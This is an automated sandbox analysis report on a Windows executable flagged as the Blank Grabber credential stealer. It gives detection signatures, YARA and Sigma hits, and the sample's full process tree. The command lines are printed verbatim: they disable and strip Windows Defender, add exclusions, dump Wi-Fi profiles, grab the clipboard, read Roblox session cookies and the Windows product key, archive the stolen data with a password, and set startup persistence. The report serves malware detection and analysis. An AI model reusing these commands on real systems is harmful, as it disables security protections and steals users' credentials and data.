
Windows Analysis Report
X9g8L63QGs.exe

Overview

General Information

Sample name: X9g8L63QGs.exe (renamed because original name is a hash value)
Original sample name: 006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
Analysis ID: 1584308
MD5: 17e85e39754db87356121c00e17d3096
SHA1: ab01140ebc61d625989f842eb2db9bdc79c15444
SHA256: 006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4
Tags: exe, user-zhuzhu0009

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • X9g8L63QGs.exe (PID: 3396 cmdline: "C:\Users\user\Desktop\X9g8L63QGs.exe" MD5: 17E85E39754DB87356121C00E17D3096)
    • X9g8L63QGs.exe (PID: 3800 cmdline: "C:\Users\user\Desktop\X9g8L63QGs.exe" MD5: 17E85E39754DB87356121C00E17D3096)
      • cmd.exe (PID: 1476 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7268 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1260 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7296 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 1516 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 5568 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7276 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7332 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7340 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7692 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7792 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7876 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8088 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8172 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7844 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7772 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7312 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3540 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7392 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7632 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7280 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 700 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1196 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1476 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3620 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 6836 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2044 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3920 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 5528 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7256 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7756 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5940 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7392 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 6996 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 3032 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7396 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4340 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6684 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7644 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8124 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6828 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 2564 cmdline: C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 4232 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6836 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7652 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8060 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7220 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7264 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7892 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7760 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI33962\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'", ProcessId: 1476, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 1260, ProcessName: cmd.exe
Source: Process started; Author: @ROxPinTeddy; Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\X9g8L63QGs.exe", ParentImage: C:\Users\user\Desktop\X9g8L63QGs.exe, ParentProcessId: 3800, ParentProcessName: X9g8L63QGs.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *", ProcessId: 6828, ProcessName: cmd.exe
Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 6836, StartAddress: 2B6F32B0, TargetImage: C:\Windows\System32\systeminfo.exe, TargetProcessId: 6836
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\X9g8L63QGs.exe, ProcessId: 3800, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
